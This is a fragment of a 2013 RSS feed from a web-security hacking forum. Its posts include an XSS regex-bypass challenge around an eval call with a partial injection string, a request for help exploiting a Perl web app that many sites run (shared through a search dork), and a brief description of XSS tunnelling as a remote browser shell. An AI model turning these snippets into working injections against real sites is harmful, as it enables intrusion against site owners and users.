The entire project has been conceived, designed, programmed and developed in one night, <br />
between London, Milan and Rome. <br />
<br />
Blow your brain. <br />
<br />
http://blowbrain.clicklife.it]]></description>
            <dc:creator>Nerder</dc:creator>
            <category>News and Links</category>
            <pubDate>Mon, 11 Feb 2013 19:11:59 -0600</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?2,51690,51690#msg-51690</guid>
            <title>XSS Challenge (no replies)</title>
            <link>http://sla.ckers.org/forum/read.php?2,51690,51690#msg-51690</link>
            <description><![CDATA[Hey folks,<br />
<br />
I am new here. Is nice to meet you guys.<br />
<br />
I am with a challenge, but I could not solve it. I need bypass a regex to execute javascript inside eval.<br />
<br />
The code is:<br />
<br />
function json(a){ <br />
    if (/^\s*$/.test(a) ? 0 : /^[\],:{}\s\u2028\u2029]*$/<br />
        .test(a.replace(/\\[&quot;\\\/bfnrtu]/g, &quot;@&quot;)<br />
        .replace(/&quot;[^&quot;\\\n\r\u2028\u2029\x00-\x08\x0a-\x1f]*&quot;|true|false|null|-?\d+(?:\.\d*)?(?:[eE][+\-]?\d+)?/g, &quot;]&quot;)<br />
        .replace(/(?:^|:|,)(?:[\s\u2028\u2029]*\[)+/g, &quot;&quot;))) <br />
<br />
     try{ <br />
         return eval(&quot;(&quot; + a + &quot;)&quot;) <br />
     } catch (b) {} <br />
     g(Error(&quot;Invalid JSON string: &quot; + a)) <br />
}<br />
//... <br />
json(window.name);<br />
<br />
<br />
This (&quot;true);alert(9);//&quot; is very close to a valid javascript statement and will bypass this regex, but still is invalid. The problem? The quote. =(<br />
<br />
Any ideas?]]></description>
            <dc:creator>lucasnn</dc:creator>
            <category>XSS Info</category>
            <pubDate>Fri, 08 Feb 2013 00:46:12 -0600</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?16,51687,51687#msg-51687</guid>
            <title>[Perl] WebApp, How can i exploit? (3 replies)</title>
            <link>http://sla.ckers.org/forum/read.php?16,51687,51687#msg-51687</link>
            <description><![CDATA[Hello everyone,<br />
Is couple of days that i try to exploit this webapplication, coded in perl.<br />
<br />
Someone already try to do something similar?<br />
I hope in a fast help.<br />
Thx in advance.<br />
<br />
This one is a simple dork, many website use this application and everyone have the same vulnz:<br />
<br />
http://goo.gl/cgnXG<br />
<br />
this is the error that i found:<br />
<br />
http://imgur.com/19kk2Q5<br />
<br />
*Edit: correct some error.]]></description>
            <dc:creator>Nerder</dc:creator>
            <category>SQL and Code Injection</category>
            <pubDate>Sun, 10 Feb 2013 08:24:43 -0600</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?2,51680,51680#msg-51680</guid>
            <title>Cross Site Scripting Tunneling (no replies)</title>
            <link>http://sla.ckers.org/forum/read.php?2,51680,51680#msg-51680</link>
            <description><![CDATA[I haven't found anything about this kind of attacks in the forum so I wan't to post some information abaut XSS Tunneling.<br />
<br />
~&gt; What's a XSS tunnel?<br />
<br />
Ok, XSST is a HTTP connection that you can stablish with a victim trhow a XSS usually attack.<br />
<br />
~&gt; What offers this attack?<br />
<br />
This kind of attacks offers you a shell based on JS and allows you to execute some commands in victim's PC but the best of it is that you can configure victim's browser so as to reconnect whit your machine every  time it starts.<br />
<br />
More info ~~~&gt; labs[dot]portcullis[dot]co[dot]uk/application/xss-tunnelling/<br />
<br />
There is a paper in the web very easy so as to understand it.<br />
<br />
Gr33tings!]]></description>
            <dc:creator>Sr.Gr33n</dc:creator>
            <category>XSS Info</category>
            <pubDate>Sun, 27 Jan 2013 11:44:16 -0600</pubDate>
        </item>
    </channel>
</rss>
